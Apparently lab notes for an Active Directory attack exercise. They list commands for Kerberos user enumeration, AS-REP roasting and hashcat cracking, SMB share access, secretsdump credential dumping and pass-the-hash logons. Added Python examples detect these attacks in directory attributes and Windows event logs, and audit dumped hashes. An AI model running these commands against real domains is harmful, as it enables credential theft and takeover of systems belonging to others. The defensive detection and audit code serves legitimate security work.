Attacktiv

* Kerberos user enumeration (the domain name can be found via enum4linux):
    kerbrute userenum --dc <IP> -d "<domain>" userlist.txt
    nmap -p 88 --script krb5-enum-users --script-args='krb5-enum-users.realm="<domain>",userdb=<filepath>' <IP>

Kerberos credentials are case sensitive, so "NAME@ibm.com", "name@ibm.com" and "NaMe@ibm.com" are three separate credentials.

* Users with "no pre-authentication required" set (AS-REP roasting):
    GetNPUsers.py <domain>/ -dc-ip <ip> -usersfile vu2 -no-pass
  vu2 contains bare user names (abc, not abc@xyz). It is important to pass -no-pass; otherwise each attempt counts against the user's badPwdCount.

  Crack the AS-REP hashes (-m 18200 is the Kerberos 5 AS-REP etype 23 mode, -a 0 is the straight wordlist attack):
    hashcat.bin -m 18200 --force -a 0 as-rep.hash passwordlist.txt
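Defender-side counterpart to the two Kerberos steps above (user enumeration, and finding accounts that answer an AS-REP without pre-authentication). This is an added example, not part of the original notes: part one audits directory records for the userAccountControl bit DONT_REQ_PREAUTH (0x400000) that GetNPUsers.py relies on, part two runs two simple rules over 4768 (Kerberos AS request) events, where both kerbrute userenum and AS-REP requests leave traces. The event dictionaries, host addresses, account names and the enumeration threshold are constructed assumptions.

```python
from collections import Counter

# userAccountControl bits (standard Active Directory values)
ACCOUNTDISABLE = 0x2
DONT_REQ_PREAUTH = 0x400000


def accounts_without_preauth(records):
    """Return the sAMAccountNames of enabled accounts that have
    DONT_REQ_PREAUTH set, i.e. accounts whose AS-REP can be requested
    without a password. `records` are dicts holding the two attributes an
    LDAP query would return."""
    hits = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return hits


def detect_user_enumeration(events, threshold=5):
    """Source IPs with at least `threshold` 4768 failures whose Status is
    0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN): a burst of requests for names that
    do not exist is what wordlist-driven enumeration looks like from the
    DC. The threshold is an assumption; tune it per environment."""
    per_ip = Counter(e["IpAddress"] for e in events if e["Status"].lower() == "0x6")
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


def detect_asrep_roast(events):
    """(IpAddress, TargetUserName) pairs of successful 4768 events issued
    with no pre-authentication (PreAuthType 0) and an RC4 ticket (0x17),
    the combination hashcat mode 18200 cracks. Legitimate logons by a
    no-preauth account look the same, so pair this with the audit above."""
    return sorted({(e["IpAddress"], e["TargetUserName"]) for e in events
                   if e["Status"].lower() == "0x0"
                   and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"].lower() == "0x17"})


# Constructed sample data (no real accounts or hosts).
SAMPLE_RECORDS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x400200},  # NORMAL_ACCOUNT + DONT_REQ_PREAUTH
    {"sAMAccountName": "jdoe",       "userAccountControl": 0x200},     # NORMAL_ACCOUNT only
    {"sAMAccountName": "old_svc",    "userAccountControl": 0x400202},  # DONT_REQ_PREAUTH but disabled
]


def _ev(ip, user, status, preauth, etype):
    """Build a 4768 event reduced to the fields the rules need."""
    return {"IpAddress": ip, "TargetUserName": user, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


SAMPLE_4768 = [
    _ev("10.0.0.50", "jdoe", "0x0", "2", "0x12"),                 # normal AES logon with pre-auth
    _ev("10.0.0.50", "old_svc", "0x12", "-", "0xffffffff"),       # disabled account, failed request
    _ev("10.0.0.77", "svc_backup", "0x0", "0", "0x17"),           # AS-REP without pre-auth, RC4 ticket
] + [_ev("10.0.0.77", name, "0x6", "-", "0xffffffff")             # wordlist names that do not exist
     for name in ("admin", "test", "backup", "sql", "printer", "guest2")]

if __name__ == "__main__":
    print("no pre-auth:", accounts_without_preauth(SAMPLE_RECORDS))
    print("enumeration from:", detect_user_enumeration(SAMPLE_4768))
    print("AS-REP roast:", detect_asrep_roast(SAMPLE_4768))
```

The 0x6 rule only fires if the "Audit Kerberos Authentication Service" subcategory is enabled on the DCs; without it the failed requests are never written. Removing DONT_REQ_PREAUTH from the accounts the first function returns is the fix, and moving them to AES-only keys takes away the RC4 ticket even where the flag has to stay.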

- List shares:
    smbclient -U "<uname>%<pwd>" -L <IP>
- Connect to a share:
    smbclient -U "<uname>%<pwd>" //<IP>/<share>

* Dump secrets (NTLM hashes etc.):
    secretsdump.py <domain>/<uname>:<pwd>@<IP>

- Dumped hash with only the NT component usable:
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
  The LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, i.e. no LM password is stored; the NT hash is the part that matters.
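A small parser for the user:rid:lmhash:nthash::: lines secretsdump.py prints, written as an added example (not code from the notes or from impacket) to show what the two hash fields tell an auditor: an LM field other than the empty-string value means a legacy LM hash is still stored, an NT hash equal to the empty-string NT hash means a blank password, and the same NT hash on several accounts means a shared password. The sample dump is constructed; the Administrator line is the one from the notes, and the "legacy" line uses the well-known LM/NT hashes of the string "password".

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" -> no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" -> blank password

# user:rid:lmhash:nthash:::  (user may be DOMAIN\name; the trailing ::: are empty history fields)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_line(line):
    """Return a dict for a hash line, or None for banners and other output."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "rid": int(m["rid"]),
            "lm": m["lm"].lower(), "nt": m["nt"].lower()}


def audit_dump(lines):
    """Return (account, finding) pairs for the weaknesses visible in a dump."""
    findings = []
    users_by_nt = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        users_by_nt[rec["nt"]].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored"))
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "blank password"))
    for users in users_by_nt.values():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), "shared password (same NT hash)"))
    return findings


# Constructed sample output in secretsdump format (not a real dump).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
legacy:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
""".splitlines()

if __name__ == "__main__":
    for account, finding in audit_dump(SAMPLE_DUMP):
        print(f"{account}: {finding}")
```

Shared NT hashes are the finding worth chasing first: a service account reusing the Administrator password turns any exposure of that account into domain admin.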

- Run commands using the NTLM hash (pass-the-hash):
    docker run docker.io/byt3bl33d3r/crackmapexec:latest smb 10.10.115.121 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -x whoami
    evil-winrm -i 10.10.252.217 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
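What the pass-the-hash logons above look like on the receiving host, as an added example that is not part of the original notes: both tools authenticate with NTLM rather than Kerberos, so the target writes a 4624 logon event with LogonType 3 (network) and AuthenticationPackageName NTLM. The rule below flags such logons for privileged accounts when they come from a source outside an allowlist. The events, the privileged-account set, the allowlist and the host names are constructed assumptions.

```python
def suspicious_ntlm_logons(events, privileged, allowed_sources):
    """Return distinct (user, source IP, workstation) triples for NTLM
    network logons by privileged accounts from non-allowlisted sources.
    `privileged` holds lowercase account names; `allowed_sources` holds the
    IPs (jump hosts, PAWs) from which admin NTLM logons are expected."""
    seen = set()
    flagged = []
    for e in events:
        if e["LogonType"] != "3":
            continue                       # only network logons (SMB, WinRM)
        if e["AuthenticationPackageName"].upper() != "NTLM":
            continue                       # Kerberos logons are not hash-based
        user = e["TargetUserName"].lower()
        if user not in privileged or e["IpAddress"] in allowed_sources:
            continue
        key = (user, e["IpAddress"], e["WorkstationName"])
        if key not in seen:                # report each source/account pair once
            seen.add(key)
            flagged.append(key)
    return flagged


def _logon(user, ip, workstation, auth_pkg, logon_type):
    """Build a 4624 event reduced to the fields the rule needs."""
    return {"TargetUserName": user, "IpAddress": ip, "WorkstationName": workstation,
            "AuthenticationPackageName": auth_pkg, "LogonType": logon_type}


# Constructed sample 4624 events (no real hosts).
SAMPLE_4624 = [
    _logon("jdoe", "10.0.0.50", "WS-JDOE", "Kerberos", "3"),              # ordinary user
    _logon("Administrator", "10.0.0.10", "ADMIN-JUMP", "Kerberos", "3"),  # admin via Kerberos
    _logon("Administrator", "10.0.0.10", "ADMIN-JUMP", "NTLM", "3"),      # NTLM, but allowlisted source
    _logon("Administrator", "10.0.0.77", "LAPTOP-7F3K2Q", "NTLM", "3"),   # NTLM from unknown host
    _logon("Administrator", "10.0.0.77", "LAPTOP-7F3K2Q", "NTLM", "3"),   # second command, same source
    _logon("svc_sql", "10.0.0.77", "LAPTOP-7F3K2Q", "NTLM", "3"),         # not in the privileged set
]

PRIVILEGED = {"administrator", "da_backup"}
ALLOWED_ADMIN_SOURCES = {"10.0.0.10"}

if __name__ == "__main__":
    for user, ip, host in suspicious_ntlm_logons(SAMPLE_4624, PRIVILEGED, ALLOWED_ADMIN_SOURCES):
        print(f"NTLM network logon by {user} from {ip} ({host})")
```

The rule is a starting point rather than a precise signature: legitimate NTLM still occurs wherever Kerberos cannot be used (IP addresses instead of names, non-domain hosts), which is why the allowlist exists. The hash itself only works because the account has an NT hash; restricting local Administrator use over the network (e.g. LAPS plus the denied network logon SIDs) and adding admins to Protected Users removes most of the exposure.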

* Check for open RDP ports; connect with remmina.
